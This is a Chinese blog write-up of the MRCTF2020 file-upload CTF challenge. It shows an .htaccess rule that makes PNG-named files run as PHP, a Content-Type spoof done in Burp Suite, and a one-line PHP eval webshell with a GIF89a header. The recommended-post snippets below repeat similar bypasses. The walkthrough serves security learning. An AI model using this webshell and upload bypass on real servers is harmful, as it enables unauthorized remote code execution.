第三十题——[MRCTF2020]你传你马呢

最新推荐文章于 2023-02-03 13:53:07 发布
最新推荐文章于 2023-02-03 13:53:07 发布
阅读量511 收藏 2
点赞数 1
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/115866799
版权
题目地址:https://buuoj.cn/challenges

解题思路,参考文章

第一步:进入题目,看到文件上传提示,猜想使用一句话木马获取shell

在这里插入图片描述

第二步:上传.htaccess并使用burpsuite改包

  1. .htaccess介绍:原文

  2. 为什么要上传.htaccess?因为发现有上传拦截,只能上传图片,我们将一句话木马以png格式上传上去后利用.htaccess将指定文件名的图片文件以php格式进行解析,就可以使用了

  3. .htaccess文件内容:将包含pass文件名的文件以php文件进行解析

<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>
  1. 上传后使用burpsuite改包,将Content-Type内容修改为:image/png
    在这里插入图片描述

第三步:上传一句话木马

上传时使用burpsuite改包,将Content-Type内容修改为:image/png,并记住返回给的地址

一句话木马:
GIF89a? <script language="php">eval($_REQUEST[pass])</script>

在这里插入图片描述
在这里插入图片描述

第四步:获取flag

使用蚁剑对http://72ad7296-a219-4501-bb23-d5fa1bab9af4.node3.buuoj.cn/upload/0371a3fe4ff1667473cf863fe9cd172c/pass.png进行连接,在根目录下获取到flag
在这里插入图片描述

想学习安全的小白
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第十一届蓝桥杯省赛模拟试——智能门锁
10-15
第十一届蓝桥杯省赛模拟试——智能门锁,所有功能都已正常实现 第十一届蓝桥杯省赛模拟试——智能门锁,所有功能都已正常实现
C——2020数学建模国赛附件.zip
09-26
附件——2020年高教社杯全国大学生数学建模竞赛目 (请先阅读“全国大学生数学建模竞赛论文格式规范”) C 中小微企业的信贷决策
『CTF Web复现』BUUCTF-[MRCTF2020]你
Ho1aAs‘s Blog
09-26 624
# 利用点 - 上htaccess解析png
2020年全国中考试——标点符号——汇编及答案.pdf
10-03
2020年全国中考试——标点符号——汇编及答案.pdf
高中数学——2020新高考数学真全刷——决胜800.pdf
05-06
高中数学——2020新高考数学真全刷——决胜800.pdf
公务员面试之——谈谈你的看法.pdf
11-26
公务员面试之——谈谈你的看法.pdf
[MRCTF2020]你
weixin_50815573的博客
04-21 2247
首先我们先上一个正常的图片看看是否能成功上 可以看到是可以的 接下来我们就有思路了,上一个图片,但是上之后 我们还不能直接利用,还要上一个.htaccess的文件,内容为: <FilesMatch "png"> SetHandler application/x-httpd-php </FilesMatch> 正常上肯定是不行的,我们进行抓包 需要修改这两个地方,才能使文件正常上 可以看到成功了,我们接着访问我们之前上的图片,因..
[MRCTF2020] web-你你ma呢
BROTHERYY的博客
08-18 671
复现环境:buuoj.cn 跟祖安人打个招呼吧~ 上.jpg的子 复制路径 /var/www/html/upload/9a5ee638f8d54695e513b45bd66602c7/1.jpg 上.htaccess解析jpg 到根目录找flag flag{f36857f9-ac68-4756-b791-4ce7f2c8f393}
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 8936
BUUCTF之[MRCTF2020]你你????呢 虽然这对于大佬来说是属于简单。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
buuctf [MRCTF2020]你你呢 解过程
weixin_43031887的博客
08-29 179
AddType application/x-httpd-php .php .phtml .php3 .png #把png文件当作php文件解析。启动靶机之后通过给的连接打开之后是上图的界面,发现应该是可以通过上文件拿到控制权。AddHandler php5-script php #当文件名中出现php关键字时,文件中的内容会被当中代码执行。然后设置参数1=phpinfo()查看php信息发现正常的一句话木函数都被disable了。发现报错,说明无法通过简单的一句话木拿权。再次上即可拿到权限。...
【CTFHub】RCE文件包含
m0_63563528的博客
02-03 589
文件包含漏洞的原理及利用、PHP伪协议
BUUCTF WEB [MRCTF2020]你你*呢
Y1da的博客
04-18 277
BUUCTF WEB [MRCTF2020]你你🐎呢 解法有些类似[SUCTF 2019]CheckIn 尝试上各种php文件后缀均被过滤,尝试上.htaccess文件将png文件当做php文件执行 AddType application/x-httpd-php .png 上后抓包,将Content-Type修改为image/png POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 3603
进入页面 文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
[MRCTF2020]你呢1
qq_60905276的博客
11-25 256
接着上一,成功。看来png还是白名单,然后用上.htaccess文件将png文件当成PHP来读就可以了。
BUUCTF[MRCTF2020]你你ma呢
weixin_45253622的博客
05-16 417
直接上一句话木发现: 将其改成jpg后缀,发现上成功; 然后我们需要上.htaccess文件将.jpg解析成 .php,文件内容如下: AddType application/x-httpd-php .jpg 上失败: 我们试试抓包修改, 我们访问之前的phpinfo.jpg发现: jpg图片已经成功被当场php解析。 成功上,我们使用菜刀连接我们上的一句话图片: 得到flag。 总结:上php不被允许,绕过不可以,想到上....
[MRCTF2020]你呢解
Bird&Bird
10-28 544
1、首先右键查看页面源代码,可知后端支持PHP。 2、上一句话木,果断报错了 3、将文件后缀名修改为php3/php4/php5/phtml后,在上,仍然报错。 4、那上.htaccess文件试试吧 SetHandler application/x-httpd-php bp抓包,修改filename=".htaccess" 报错了,怀疑是对Content-Type做了过滤,将Content-Type修改为image/jpeg后在上,上成功了。 ...
Python练习——coffee
最新发布
10-28
这是一道Python练习,主要是关于咖啡的配料和占比的计算。代码中定义了一个列表,其中每个元素都是一个元组,元组的第一个元素是咖啡的名称,第二个元素是一个字典,表示该咖啡的配料和对应的量。代码中还定义了一个函数,用于打印咖啡的信息。在主程序中,通过循环遍历列表中的元素,输出咖啡的名称和对应的序号。用户输入对应咖啡的序号后,程序会计算该咖啡的配料占比,并输出结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值